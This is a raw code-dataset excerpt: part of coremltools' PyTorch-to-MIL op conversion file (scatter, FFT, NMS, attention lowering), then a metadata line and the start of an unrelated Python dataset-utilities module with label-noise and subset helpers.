mode=mode, name=name)\n context.add(result)\n\n\n@register_torch_op\ndef scatter(context, node):\n inputs = _get_inputs(context, node)\n assert len(inputs) in (4, 5)\n\n # Determine reduce/mode parameter\n if len(inputs) == 5:\n mode = inputs[4].val\n if mode == 'multiply':\n mode = 'mul'\n else:\n assert mode == 'add'\n else:\n mode = 'update'\n\n _scatter(context, inputs, mode, node.name)\n\n\n@register_torch_op\ndef scatter_add(context, node):\n inputs = _get_inputs(context, node)\n _scatter(context, inputs, 'add', node.name)\n\n\n@register_torch_op\ndef baddbmm(context, node):\n \"\"\"\n baddbmm(Tensor input, Tensor batch1, Tensor batch2, Scalar beta=1, Scalar alpha=1)\n output = beta * input + alpha * batch1 * batch2\n\n Notice that batch1 and batch2 must be 3-D tensors each containing the same number of matrices.\n If batch1 is a (b×n×m) tensor, batch2 is a (b×m×p) tensor, then input must be broadcastable with a (b×n×p) 
tensor\n and out will be a (b×n×p) tensor.\n \"\"\"\n assert len(node.outputs) == 1\n inputs = _get_inputs(context, node, expected=5)\n bias, batch1, batch2, beta, alpha = inputs\n\n if alpha.val != 1.0:\n # Apply scaling factor alpha to the input.\n batch1 = mb.mul(x=alpha, y=batch1, name=batch1.name + \"_scaled\")\n context.add(batch1)\n\n bmm_node = mb.matmul(x=batch1, y=batch2, name=node.name + \"_bmm\")\n\n if beta.val != 0.0 or bias.shape != bmm_node.shape:\n context.add(bmm_node)\n if beta.val != 1.0:\n # Torch supports integers, so convert to float before\n if beta.dtype != bias.dtype:\n logger.warning(\n f\"Casting the `beta`(value={beta.val}) argument of `baddbmm` op {node.name} \"\n f\"from {beta.dtype} to {bias.dtype} dtype\")\n beta = mb.cast(x=beta, dtype=TYPE_TO_DTYPE_STRING[bias.dtype])\n # Apply scaling factor beta to the bias.\n bias = mb.mul(x=beta, y=bias, name=bias.name + \"_scaled\")\n context.add(bias)\n\n baddbmm_node = mb.add(x=bias, y=bmm_node, name=node.name)\n context.add(baddbmm_node)\n else:\n bmm_node.name = node.name\n context.add(bmm_node)\n\n\n\n@register_torch_op\ndef glu(context, node):\n \"\"\"\n glu(Tensor input, Scalar dim=-1)\n Applies the gated linear unit function GLU(a,b)=a⊗σ(b) where a is the first half of the input matrices and b is the\n second half.\n \"\"\"\n assert len(node.outputs) == 1\n inputs = _get_inputs(context, node, expected=2)\n input, axis = inputs\n\n first_half, second_half = mb.split(x=input, num_splits=2, axis=axis.val, name=node.name + \"_split\")\n context.add(first_half)\n context.add(second_half)\n\n sigmoid_second_half = mb.sigmoid(x=second_half, name=second_half.name + \"_sigmoid\")\n context.add(sigmoid_second_half)\n\n glu_node = mb.mul(x=first_half, y=sigmoid_second_half, name=node.name)\n context.add(glu_node)\n\n\n@register_torch_op\ndef hstack(context, node):\n \"\"\"\n hstack(List[Tensor] tensors, Optional[Tensor] out)\n Stack tensors in sequence horizontally (column wise). This is equivalent to concatenation along the first axis for\n 1-D tensors, and along the second axis for all other tensors.\n \"\"\"\n inputs = _get_inputs(context, node)\n tensors = inputs[0]\n input_shapes = [list(x.shape) for x in tensors]\n # Concatenates along the first axis for 1-D tensors, and along the second axis for all other tensors.\n axis = 0 if len(input_shapes[0]) == 1 else 1\n hstack_node = mb.concat(values=tensors, axis=axis, name=node.name)\n context.add(hstack_node)\n\n\n@register_torch_op\ndef remainder(context, node):\n \"\"\"\n remainder(Tensor dividend, Tensor divisor, Optional[Tensor] out)\n Computes Python’s modulus operation entrywise. The result has the same sign as the divisor and its absolute value\n is less than that of divisor. 
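For example, remainder(-7, 3) = -7 - floor(-7/3) * 3 = -7 - (-3) * 3 = 2, which takes the divisor's sign. 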
It may also be defined in terms of torch.div() as:\n remainder(a, b) == a - a.div(b, rounding_mode=\"floor\") * b\n \"\"\"\n # Don't specify `expected` because the parameter `out` is optional.\n inputs = _get_inputs(context, node)\n dividend, divisor = promote_input_dtypes([inputs[0], inputs[1]])\n div_node = mb.floor_div(x=dividend, y=divisor, name=node.name + \"_div\")\n context.add(div_node)\n scaled_div = mb.mul(x=div_node, y=divisor, name=div_node.name + \"_scaled\")\n context.add(scaled_div)\n remainder_node = mb.sub(x=dividend, y=scaled_div, name=node.name)\n context.add(remainder_node)\n\n\n@register_torch_op\ndef hann_window(context, node):\n inputs = _get_inputs(context, node, expected=[5, 6])\n if inputs[0].val is None:\n raise NotImplementedError(\"variable 'window_length' not supported.\")\n\n periodic = True\n if len(inputs) == 6:\n if inputs[1].val is None:\n raise NotImplementedError(\"variable 'periodic' not supported.\")\n if not inputs[1].val:\n periodic = False\n\n size = (inputs[0].val,)\n if inputs[0].val <= 1:\n one = mb.fill(shape=size, value=1.0, name=node.name)\n context.add(one)\n return\n\n ones = mb.fill(shape=size, value=1.0)\n cum = mb.cumsum(x=ones, axis=0)\n seq = mb.sub(x=cum, y=ones)\n pi = mb.fill(shape=size, value=_math.pi)\n window_length_float = mb.cast(x=inputs[0], dtype=\"fp32\")\n if not periodic:\n window_length_float = mb.sub(x=window_length_float, y=ones)\n denominator = mb.fill(shape=size, value=window_length_float)\n numerator = mb.mul(x=seq, y=pi)\n frac = mb.real_div(x=numerator, y=denominator)\n sin = mb.sin(x=frac)\n sin_sq = mb.mul(x=sin, y=sin, name=node.name)\n context.add(sin_sq)\n\n@register_torch_op\ndef mse_loss(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n y = inputs[1]\n reduction = inputs[2].val\n\n diff = mb.sub(x=x, y=y)\n\n if reduction == 0:\n # reduction is \"none\"\n res = mb.mul(x=diff, y=diff, name=node.name)\n context.add(res)\n return\n\n square = mb.mul(x=diff, y=diff)\n if reduction == 1:\n # reduction is \"mean\"\n res = mb.reduce_mean(x=square, axes=None, name=node.name)\n\n elif reduction == 2:\n # reduction is \"sum\"\n res = mb.reduce_sum(x=square, axes=None, name=node.name)\n else:\n raise ValueError(\"Reduction is not supported\")\n\n context.add(res)\n\n@register_torch_op\ndef trace(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n dims = mb.shape(x=x)\n dim0 = value_at(dims, 0)\n dim1 = value_at(dims, 1)\n min_dim = mb.minimum(x=dim0, y=dim1)\n indices = mb.range_1d(end=min_dim, start=0, step=1)\n indices = mb.stack(values=[indices, indices], axis=1)\n diagonal = mb.gather_nd(x=x, indices=indices)\n trace = mb.reduce_sum(x=diagonal, name=node.name)\n context.add(trace)\n\n@register_torch_op\ndef roll(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n shift = inputs[1].val\n dims = inputs[2].val\n origin_shape = mb.shape(x=x)\n\n need_flatten = len(dims) == 0\n\n if need_flatten:\n # The tensor is flattened before rolling\n x = mb.reshape(x=x, shape=[-1])\n dims = [0]\n\n shape = mb.shape(x=x)\n\n for s, i in zip(shift, dims):\n dim = value_at(shape, i)\n s = mb.mod(x=s, y=dim)\n start_idx = mb.sub(x=dim, y=s)\n indices0 = mb.range_1d(end=dim, start=start_idx, step=1)\n indices1 = mb.range_1d(end=start_idx, start=0, step=1)\n indices = mb.concat(values=[indices0, indices1], axis=0)\n x = mb.gather(x=x, indices=indices, axis=i)\n\n if need_flatten:\n x = mb.reshape(x=x, shape=origin_shape)\n\n context.add(x, 
node.name)\n\n\ndef _construct_unfold_indices(N, C, H, W, kernel_size, stride):\n \"\"\"\n A utility function to construct indices for torch.unfold (im2col),\n assuming the torch.unfold input `x` to be contiguous\n \"\"\"\n\n # Get starting block indices.\n start_idx = _np.arange(kernel_size[0])[None, :, None] * W + _np.arange(\n kernel_size[1]\n )\n\n # Generate depth indices.\n channel_index = H * W * _np.arange(C)\n start_idx = (channel_index[None, :, None] + _np.ravel(start_idx)).reshape(\n (-1, kernel_size[0], kernel_size[1])\n )\n\n # Get offsetted indices across the height and width of input array.\n row_extent = H - kernel_size[0] + 1\n col_extent = W - kernel_size[1] + 1\n offset_idx = _np.arange(0, row_extent, stride[0])[None, :, None] * W + _np.arange(0, col_extent, stride[1])\n indices = _np.ravel(start_idx)[:, None] + _np.ravel(offset_idx)\n\n # Get batch block indices.\n batch_idx = _np.arange(N)[:, None, None] * C * H * W\n indices = batch_idx + indices\n\n return indices.reshape(-1)\n\n\n@register_torch_op\ndef im2col(context, node):\n \"\"\"\n Extract sliding local blocks from a batched input tensor (rank=4).\n\n torch.nn.functional.unfold aims to be the general version: im2col is the rank=4 case of unfold.\n PyTorch currently only supports rank=4 input: torch.nn.functional.unfold redispatches to at::im2col,\n which is why coremltools needs im2col to convert torch.nn.functional.unfold.\n\n We currently only support rank=4 input (consistent with PyTorch) and dilation set to 1.\n More flexbible dilation support will be added in the future.\n\n Reference https://pytorch.org/docs/stable/generated/torch.nn.Unfold.html\n \"\"\"\n inputs = _get_inputs(context, node, expected=5)\n x = inputs[0]\n kernel_size = inputs[1].val\n dilation = inputs[2].val\n padding = inputs[3].val\n stride = inputs[4].val\n\n if x.rank != 4:\n raise ValueError(\"Only supports rank=4 input data for im2col (unfold).\")\n if not (dilation[0] == 1 and dilation[1] == 1):\n raise ValueError(\"Only supports dilation=1 for im2col (unfold).\")\n\n # for simplicity, we explicitly pad; TODO: implicit padding would be more efficient\n # torch.unfold padding has different semantics\n # * for torch.unfold\n # x.shape[i + x.rank - padding.rank] = padding[i] + x.shape[i + x.rank - padding.rank] + padding[i]\n # taking x.rank = 4 and padding.rank = 2 as an example:\n # x.shape[0 + 4 - 2] = padding[0] + x.shape[0 + 4 - 2] + padding[0]\n # x.shape[1 + 4 - 2] = padding[1] + x.shape[1 + 4 - 2] + padding[1]\n # * for mb.pad(x=x, pad=pad, mode=\"constant\")\n # x.shape[i] = pad[2 * i] + x.shape[i] + pad[2 * i + 1]\n # * for torch.nn.functional.pad\n # x.shape[-1] = padding[0] +x.shape[-1] + padding[1]\n # x.shape[-2] = padding[2] +x.shape[-1] + padding[3]\n # ...\n # x.shape[-i] = padding[2 * i - 2] + x.shape[-i] + padding[2 * i - 1]\n # so we need to convert torch.unfold padding to mb.pad(mode=\"constant\") pad\n missing_dims = x.rank - len(padding)\n pad = [0, 0] * missing_dims + _np.array(padding).repeat(2).tolist()\n x = mb.pad(x=x, pad=pad, mode=\"constant\")\n\n N, C, H, W = x.shape\n\n # Get total number of blocks. 
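(For example, H = W = 4 with kernel_size = (2, 2) and stride = (2, 2) gives floor((4 - 1*(2 - 1) - 1)/2 + 1) = 2 blocks per spatial dimension, i.e. block_count = 4.) 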
It follows the formula at torch.nn.Unfold documentation.\n sptial_size = (H, W)\n block_count = 1\n for i in range(2):\n block_count *= _np.floor(\n # the original formula is\n # (sptial_size[i] + 2 * padding[i] - dilation[i] * (kernel_size[i] - 1) - 1) / stride[i]\n # since we have explicitly padded, we no longer add 2 * padding[i] to sptial_size[i]\n (sptial_size[i] - dilation[i] * (kernel_size[i] - 1) - 1) / stride[i]\n + 1\n ).astype(_np.int32)\n\n \"\"\"\n The implementation below assumes x to be contiguous\n \"\"\"\n\n indices = _construct_unfold_indices(N, C, H, W, kernel_size, stride)\n\n x = mb.reshape(x=x, shape=[-1])\n gathered_data = mb.gather_along_axis(x=x, indices=indices, axis=0)\n block_size = C * kernel_size[0] * kernel_size[1]\n output = mb.reshape(\n x=gathered_data, shape=(N, block_size, block_count), name=node.name\n )\n\n context.add(output)\n\n\n@register_torch_op\ndef col2im(context, node):\n \"\"\"\n Combines an array of sliding local blocks into a large containing tensor.\n\n torch.nn.functional.fold aims to be the general version:\n col2im is the \"2 output spatial dimensions\" case of fold.\n\n PyTorch currently only supports col2im: torch.nn.functional.fold redispatches to at::col2im,\n which is why coremltools needs col2im to convert torch.nn.functional.fold.\n\n We currently only support col2im (consistent with PyTorch) and:\n * dilation set to 1\n * padding set to 0\n * stride set to kernel_size\n * output_size is divisible by kernel_size\n\n More flexbible support will be added in the future.\n\n Reference https://pytorch.org/docs/stable/generated/torch.nn.Fold.html\n \"\"\"\n\n inputs = _get_inputs(context, node, expected=6)\n x = inputs[0]\n output_size = inputs[1].val\n kernel_size = inputs[2].val\n dilation = inputs[3].val\n padding = inputs[4].val\n stride = inputs[5].val\n\n if len(output_size) != 2:\n raise ValueError(\"Only supports 2 output spatial dimensions for col2im (fold).\")\n if not (dilation[0] == 1 and dilation[1] == 1):\n raise ValueError(\"Only supports dilation=1 for col2im (fold).\")\n if not (padding[0] == 0 and padding[1] == 0):\n raise ValueError(\"Only supports padding=0 for col2im (fold).\")\n # In Pytorch, if multiple entries unfold to same location, then in folding they are accumulated\n # In Core ML, however, there is no such op to perform this accumulation,\n # so we cowardly refuse to convert if accumulation happens\n # TODO: we may be able to support accumulation if x has certain symmetry (e.g. output by im2col)\n # by multiplying the repeat times of each entry\n if any(stride != kernel_size):\n raise ValueError(\"Only supports stride = kernel_size for col2im (fold).\")\n # We implement fold as an inverse to unfold\n # i.e. 
a gather with indices that are inverse to unfold gather indices\n # This works only if there is no edge leftover\n if any(output_size % kernel_size != 0):\n raise ValueError(\"Only supports output_size % kernel_size = 0 for col2im (fold).\")\n\n N, block_size, block_count = x.shape\n C = int(block_size / _np.prod(kernel_size))\n H, W = output_size\n\n \"\"\"\n The implementation below assumes x to be contiguous\n \"\"\"\n\n # inverse unfold indices\n indices_unfold = _construct_unfold_indices(N, C, H, W, kernel_size, stride)\n indices = _np.empty(indices_unfold.shape, dtype=np.int32)\n for i in range(indices.shape[0]):\n indices[indices_unfold[i]] = i\n\n # perform gather with fold indices\n x_flatten = mb.reshape(x=x, shape=(-1,))\n y_flatten_with_extra = mb.gather_along_axis(x=x_flatten, indices=indices)\n y_flatten = mb.slice_by_index(x=y_flatten_with_extra, begin=(0,), end=(N * C * H * W,))\n y = mb.reshape(x=y_flatten, shape=(N, C, H, W), name=node.name)\n\n context.add(y)\n\n\n@register_torch_op\ndef complex(context, node):\n real_part, imag_part = _get_inputs(context, node, expected=2)\n result = mb.complex(real_data=real_part, imag_data=imag_part)\n context.add(result, node.name)\n\n\n@register_torch_op\ndef real(context, node):\n input_data = _get_inputs(context, node, expected=1)[0]\n if types.is_complex(input_data.dtype):\n real_part = mb.complex_real(data=input_data)\n context.add(real_part, node.name)\n else:\n context.add(input_data, node.name)\n\n\n@register_torch_op\ndef imag(context, node):\n input_data = _get_inputs(context, node, expected=1)[0]\n if not types.is_complex(input_data.dtype):\n # Keep consistent with PyTorch.\n raise ValueError(\"The `imag` op only supports complex input.\")\n real_part = mb.complex_imag(data=input_data)\n context.add(real_part, node.name)\n\n\n@register_torch_op\ndef view_as_real(context, node):\n input_data = _get_inputs(context, node, expected=1)[0]\n if not types.is_complex(input_data.dtype):\n raise ValueError(f\"view_as_real only supports complex input, but got {types.builtin_to_string(input_data.dtype)}\")\n\n real_part = mb.complex_real(data=input_data)\n imag_part = mb.complex_imag(data=input_data)\n result = mb.stack(values=[real_part, imag_part], axis=-1)\n context.add(result, node.name)\n\n\n@register_torch_op\ndef fft_fft(context, node):\n \"\"\"Lowers torch.fft.fft by the dialect op `complex_fft` from complex_dialect_ops.py.\"\"\"\n input_data, n, dim, norm = _get_inputs(context, node, expected=[4])\n fft_res = mb.complex_fft(data=input_data, n=n, dim=dim, norm=norm)\n context.add(fft_res, node.name)\n\n\n@register_torch_op\ndef fft_fftn(context, node):\n \"\"\"Lowers torch.fft.fftn by the dialect op `complex_fftn` from complex_dialect_ops.py.\"\"\"\n input_data, shapes, dims, norm = _get_inputs(context, node, expected=[4])\n fft_res = mb.complex_fftn(data=input_data, shapes=shapes, dims=dims, norm=norm)\n context.add(fft_res, node.name)\n\n\n@register_torch_op\ndef fft_rfft(context, node):\n \"\"\"Lowers torch.fft.rfft by the dialect op `complex_rfft` from complex_dialect_ops.py.\"\"\"\n input_data, n, dim, norm = _get_inputs(context, node, expected=[4])\n rfft_res = mb.complex_rfft(data=input_data, n=n, dim=dim, norm=norm)\n context.add(rfft_res, node.name)\n\n\n@register_torch_op\ndef fft_rfftn(context, node):\n \"\"\"Lowers torch.fft.rfftn by the dialect op `complex_rfftn` from complex_dialect_ops.py.\"\"\"\n input_data, shapes, dims, norm = _get_inputs(context, node, expected=[4])\n rfft_res = 
mb.complex_rfftn(data=input_data, shapes=shapes, dims=dims, norm=norm)\n context.add(rfft_res, node.name)\n\n\n@register_torch_op\ndef fft_ifft(context, node):\n \"\"\"Lowers torch.fft.ifft by the dialect op `complex_ifft` from complex_dialect_ops.py.\"\"\"\n input_data, n, dim, norm = _get_inputs(context, node, expected=[4])\n ifft_res = mb.complex_ifft(data=input_data, n=n, dim=dim, norm=norm)\n context.add(ifft_res, node.name)\n\n\n@register_torch_op\ndef fft_ifftn(context, node):\n \"\"\"Lowers torch.fft.ifftn by the dialect op `complex_ifftn` from complex_dialect_ops.py.\"\"\"\n input_data, shapes, dims, norm = _get_inputs(context, node, expected=[4])\n ifftn_res = mb.complex_ifftn(data=input_data, shapes=shapes, dims=dims, norm=norm)\n context.add(ifftn_res, node.name)\n\n\n@register_torch_op\ndef fft_irfft(context, node):\n \"\"\"Lowers torch.fft.irfft by the dialect op `complex_irfft` from complex_dialect_ops.py.\"\"\"\n input_data, n, dim, norm = _get_inputs(context, node, expected=[4])\n irfft_res = mb.complex_irfft(data=input_data, n=n, dim=dim, norm=norm)\n context.add(irfft_res, node.name)\n\n\n@register_torch_op\ndef fft_irfftn(context, node):\n \"\"\"Lowers torch.fft.irfftn by the dialect op `complex_irfftn` from complex_dialect_ops.py.\"\"\"\n input_data, shapes, dims, norm = _get_inputs(context, node, expected=[4])\n irfftn_res = mb.complex_irfftn(data=input_data, shapes=shapes, dims=dims, norm=norm)\n context.add(irfftn_res, node.name)\n\n@register_torch_op\ndef stft(context, node):\n \"\"\"\n Lowers torch.stft with the dialect op `complex_stft` from complex_dialect_ops.py\n \"\"\"\n input_data, n_fft, hop_length, win_length, window, normalized, onesided, _ = _get_inputs(context, node, min_expected=2)\n if types.is_complex(input_data.dtype):\n onesided = False # pytorch defaults onesided to False for complex inputs\n stft_res = mb.complex_stft(\n input=input_data,\n n_fft=n_fft,\n hop_length=hop_length,\n win_length=win_length,\n window=window,\n normalized=normalized,\n onesided=onesided)\n context.add(stft_res, node.name)\n\n@register_torch_op(torch_alias=[\"torchvision::nms\"])\ndef torchvision_nms(context, node):\n inputs = _get_inputs(context, node, expected=3)\n boxes, scores = promote_input_dtypes([inputs[0], inputs[1]])\n iou_threshold = inputs[2].val\n # Use float min to avoid boxes being pruned by scores in MIL NMS op.\n score_threshold = (\n _np.finfo(_np.float16).min if boxes.dtype._width == 16 else _np.finfo(_np.float32).min\n )\n\n box_num = boxes.shape[0]\n if is_symbolic(box_num):\n # When the number of boxes is unknown at compile time, use a large number to avoid valid\n # boxes got pruned. We don't use _np.iinfo(_np.int32).max here because it triggers the MIL\n # NMS op segment fault.\n box_num = 10000\n\n # The boxes' coordinates from PyTorch input is (x1, y1, x2, y2) format with 0 <= x1 < x2 and\n # 0 <= y1 < y2. 
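(For instance, the corner-format box (10, 20, 30, 60) has width 20, height 40, and center (20, 40).) 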
However, the MIL NMS op expects CENTER_SIZE_WIDTH_FIRST format, which is\n # (x, y, width, height) where (x, y) is the center coordinate.\n x1, y1, x2, y2 = mb.split(x=boxes, num_splits=4, axis=-1)\n # For numerical stability, use x1+(x2-x1)/2 instead of (x1+x2)/2 to calculate center coordinate.\n width = mb.sub(x=x2, y=x1)\n height = mb.sub(x=y2, y=y1)\n center_x = mb.add(x=x1, y=mb.real_div(x=width, y=2.0))\n center_y = mb.add(x=y1, y=mb.real_div(x=height, y=2.0))\n boxes = mb.concat(values=[center_x, center_y, width, height], axis=-1)\n\n # Expand dims to construct the batch dim and score class dim expected by MIL NMS op.\n boxes = mb.expand_dims(x=boxes, axes=[0])\n scores = mb.expand_dims(x=scores, axes=[0, -1])\n\n if not is_current_opset_version_compatible_with(target.iOS17):\n _, _, indices, valid_outputs = mb.non_maximum_suppression(\n boxes=boxes,\n scores=scores,\n max_boxes=box_num,\n iou_threshold=iou_threshold,\n score_threshold=score_threshold,\n )\n\n indices = mb.squeeze(x=indices, axes=[0])\n valid_outputs = mb.squeeze(x=valid_outputs, axes=[0])\n range = mb.range_1d(end=valid_outputs, start=0, step=1)\n indices = mb.cast(x=indices, dtype=\"fp32\")\n valid_indices = mb.gather(x=indices, indices=range, axis=0)\n valid_indices = mb.cast(x=valid_indices, dtype=\"int32\", name=node.name)\n context.add(valid_indices)\n else:\n # In IOS17, the MIL NMS op's inputs are ordered with number of boxes in the last dimension.\n boxes = mb.transpose(x=boxes, perm=[0, 2, 1])\n scores = mb.transpose(x=scores, perm=[0, 2, 1])\n\n # In IOS17, the MIL NMS op's last output (number of valid boxes in each batch) gets removed.\n _, _, indices = mb.non_maximum_suppression(\n boxes=boxes,\n scores=scores,\n max_boxes=box_num,\n iou_threshold=iou_threshold,\n )\n\n # Remove invalid indices (the padded -1 indices).\n valid_outputs = mb.reduce_sum(\n x=mb.cast(x=mb.greater(x=indices, y=-1), dtype=\"int32\"), axes=[-1]\n )\n valid_indices = mb.slice_by_size(\n x=mb.squeeze(x=indices, axes=[0]),\n begin=mb.fill_like(ref_tensor=valid_outputs, value=0),\n size=valid_outputs,\n name=node.name,\n )\n context.add(valid_indices)\n\n\n@register_torch_op\ndef tupleindex(context, node):\n tuple_input, index_input = _get_inputs(context, node, expected=2)\n context.add(tuple_input[index_input.val], node.name)\n\n\ndef _get_causal_attn_mask(is_causal: bool, query_var: Var, key_var: Var) -> Var:\n assert is_causal\n\n # create mask of shape (target_seq, source_seq)\n # s.t the diagonal and lower triangular of the matrix is all 1s\n # and upper triangular is a large negative number (e.g. 
-30k)\n target_seq = query_var.shape[-2]\n source_seq = key_var.shape[-2]\n if is_symbolic(target_seq) or is_symbolic(source_seq):\n raise NotImplementedError(\n \"scaled_dot_product_attention op: \"\n \"is_causal flag not handled when sequence length is symbolic\"\n )\n\n all_ones = mb.fill(value=1.0, shape=(target_seq, source_seq))\n all_negative_inf = mb.fill(value=-3e4, shape=(target_seq, source_seq))\n all_ones_lower = mb.band_part(\n x=all_ones, lower=-1, upper=0\n ) # will 0 out upper triangle, excluding diag\n all_negative_inf_upper = mb.band_part(\n x=all_negative_inf, lower=0, upper=-1\n ) # will 0 out lower triangle, excluding diag\n all_negative_inf_diag_only = mb.band_part(x=all_negative_inf_upper, lower=0, upper=0)\n all_negative_inf_upper_no_diag = mb.sub(x=all_negative_inf_upper, y=all_negative_inf_diag_only)\n return mb.add(x=all_ones_lower, y=all_negative_inf_upper_no_diag)\n\n\ndef _cast_bool_attn_mask(attn_mask: Var, query_var: Var) -> Var:\n \"\"\"\n compute float mask as:\n mask = cast(bool_mask) + (1-cast(bool_mask)) * -30k*ones(shape(bool_mask))\n \"\"\"\n assert is_bool(attn_mask.dtype)\n\n shape = mb.shape(x=attn_mask)\n negative_inf = mb.fill(\n shape=shape, value=_np.array([-3e4]).astype(types.nptype_from_builtin(query_var.dtype))\n )\n mask = mb.cast(x=attn_mask, dtype=types.builtin_to_string(query_var.dtype))\n compliment_of_mask = mb.sub(\n x=_np.array([1.0]).astype(types.nptype_from_builtin(mask.dtype)), y=mask\n )\n compliment_of_mask = mb.mul(x=negative_inf, y=compliment_of_mask)\n return mb.add(x=mask, y=compliment_of_mask)\n\n\ndef _lower_scaled_dot_product_attention(q: Var, k: Var, v: Var, mask: Var, name: str) -> Var:\n # scale the query input\n embed_size = q.shape[-1]\n if is_symbolic(embed_size):\n raise ValueError(\n \"The embedding size, i.e. 
last dimension of the shape of query tensor\"\n \" cannot be symbolic, in scaled_dot_product_attention op\"\n )\n multiplicative_scale_factor = 1 / _math.sqrt(embed_size)\n q = mb.mul(x=q, y=multiplicative_scale_factor)\n\n # multiply query and key input tensors\n # shape of output: (target_seq, source_seq) or (B,...,target_seq, source_seq)\n attn_weights = mb.matmul(x=q, y=k, transpose_y=True)\n\n # add mask if applicable\n if mask is not None:\n attn_weights = mb.add(x=attn_weights, y=mask)\n\n # do softmax\n attn_weights_normalized = mb.softmax(x=attn_weights, axis=-1)\n\n # multiply attn_weights and value tensor\n res = mb.matmul(x=attn_weights_normalized, y=v, name=name)\n return res\n\n@register_torch_op\ndef scaled_dot_product_attention(context, node):\n \"\"\"\n Input shapes/types:\n - query : (target_seq, d) or (B, target_seq, d) or (B, h, target_seq, d) or (B,.., target_seq, d)\n - key : (source_seq, d) or (B, source_seq, d) or (B, h, source_seq, d) or (B,.., source_seq, d)\n - value: (source_seq, d_v) or (B, source_seq, d_v) or (B, h, source_seq, d_v) or (B,.., source_seq, d_v)\n - attn_mask : (target_seq, source_seq) or (B, target_seq, source_seq) or (B, h, target_seq, source_seq) or\n (B, ..., target_seq, source_seq)\n - is_causal : bool\n - scale : optional float\n\n Output shape: (target_seq, d_v) or (B,...,target_seq, d_v)\n\n output = softmax(scale*Q*K^transpose + mask) * V\n\n Currently, Core ML does not support dropout, so it has to be either None or 0\n\n See details at:\n https://pytorch.org/docs/stable/generated/torch.nn.functional.scaled_dot_product_attention.html\n \"\"\"\n inputs = _get_inputs(context, node, min_expected=3)\n q, k, v = inputs[:3]\n attn_mask = None if len(inputs) < 4 else inputs[3]\n dropout = 0.0 if len(inputs) < 5 else inputs[4]\n is_causal = False if len(inputs) < 6 else inputs[5].val\n \n # When len(inputs) == 7, the inputs are (q, k, v, attn_mask, dropout, is_causal, scale)\n if len(inputs) == 7 and inputs[6] is not None:\n raise NotImplementedError(\n \"scaled_dot_product_attention op: scale parameter is not handled.\"\n )\n \n if attn_mask is not None and is_causal:\n raise ValueError(\n \"scaled_dot_product_attention op: attn_mask cannot be provided when is_causal is set to True.\"\n )\n\n if dropout is not None and (dropout.val is None or dropout.val != 0.0):\n raise ValueError(\"scaled_dot_product_attention op: dropout is not supported yet\")\n\n # check that ranks of q, k, v and attn_mask match\n if k.rank != q.rank:\n raise ValueError(\n \"Rank of query and key do not match in scaled_dot_product_attention torch op\"\n )\n if v.rank != q.rank:\n raise ValueError(\n \"Rank of query and value do not match in scaled_dot_product_attention torch op\"\n )\n\n mask = None\n if is_causal:\n mask = _get_causal_attn_mask(is_causal, q, k)\n elif attn_mask is not None:\n if is_bool(attn_mask.dtype):\n mask = _cast_bool_attn_mask(attn_mask, q)\n else:\n mask = attn_mask\n\n res = _lower_scaled_dot_product_attention(q, k, v, mask, node.name)\n context.add(res)\n\n\n@register_torch_op\ndef fliplr(context, node):\n \"\"\"\n Flip tensor in the left/right direction.\n\n Flip the entries in each row in the left/right direction. 
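For example, the 2-D input [[1, 2], [3, 4]] becomes [[2, 1], [4, 3]]. 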
Columns are preserved, but appear in a\n different order than before.\n It's equivalent to TF's reverse op but with axes always be [1].\n \"\"\"\n x = _get_inputs(context, node, expected=1)[0]\n res = mb.reverse(x=x, axes=[1], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef multinomial(context, node):\n x = context[node.inputs[0]]\n num_samples = context[node.inputs[1]].val\n replacement = context[node.inputs[2]].val\n if num_samples is None:\n raise ValueError(\"In torch.multinomial op, num_samples must be const\")\n if num_samples > 1 and not replacement:\n raise ValueError(\"When num_samples is larger than 1, only replacement=True is supported.\")\n x = mb.random_categorical(x=x, size=num_samples, name=node.name)\n context.add(x)\n","repo_name":"apple/coremltools","sub_path":"coremltools/converters/mil/frontend/torch/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":223119,"program_lang":"python","lang":"en","doc_type":"code","stars":3733,"dataset":"github-code","pt":"47"} +{"seq_id":"70769519182","text":"import numpy as np\nimport torch.utils.data as data\nimport torchvision.datasets as datasets\n\nfrom collections import defaultdict\n\n\nclass LabelNoise(data.Dataset):\n def __init__(self, dataset, k, n_labels, p=1):\n\n assert n_labels % k == 0\n\n self.dataset = dataset\n self.k = k\n # random label between 0 and k-1\n self.noise = np.random.choice(k, size=len(self.dataset))\n # noisy labels are introduced for each sample with probability p\n self.p = np.random.binomial(1, p, size=len(self.dataset))\n\n print('Noisy labels (p={})'.format(p))\n\n def __getitem__(self, idx):\n img, label = self.dataset[idx]\n if self.p[idx]:\n label = label - label % self.k + self.noise[idx]\n return img, label\n\n def __len__(self):\n return len(self.dataset)\n\n\nclass Subset(data.Dataset):\n def __init__(self, dataset, indices=None):\n \"\"\"\n Subset of dataset given by indices.\n \"\"\"\n super(Subset, self).__init__()\n self.dataset = dataset\n self.indices = indices\n\n if self.indices is None:\n self.n_samples = len(self.dataset)\n else:\n self.n_samples = len(self.indices)\n assert self.n_samples >= 0 and \\\n self.n_samples <= len(self.dataset), \\\n \"length of {} incompatible with dataset of size {}\"\\\n .format(self.n_samples, len(self.dataset))\n\n def __getitem__(self, idx):\n if self.indices is None:\n return self.dataset[idx]\n else:\n return self.dataset[self.indices[idx]]\n\n def __len__(self):\n return self.n_samples\n\n\ndef random_subsets(subset_sizes, n_total, seed=None, replace=False):\n \"\"\"\n Return subsets of indices, with sizes given by the iterable\n subset_sizes, drawn from {0, ..., n_total - 1}\n Subsets may be distinct or not according to the replace option.\n Optional seed for deterministic draw.\n \"\"\"\n # save current random state\n state = np.random.get_state()\n sum_sizes = sum(subset_sizes)\n assert sum_sizes <= n_total\n\n np.random.seed(seed)\n\n total_subset = np.random.choice(n_total, size=sum_sizes,\n replace=replace)\n perm = np.random.permutation(total_subset)\n res = []\n start = 0\n for size in subset_sizes:\n res.append(perm[start: start + size])\n start += size\n # restore initial random state\n np.random.set_state(state)\n return res\n\n\ndef split_dataset(dataset_train, dataset_val, train_size, val_size):\n if isinstance(dataset_train, datasets.ImageFolder):\n n_classes = len(dataset_train.classes)\n if train_size < len(dataset_train):\n train_size_per_class = train_size // n_classes\n else:\n train_size_per_class = 
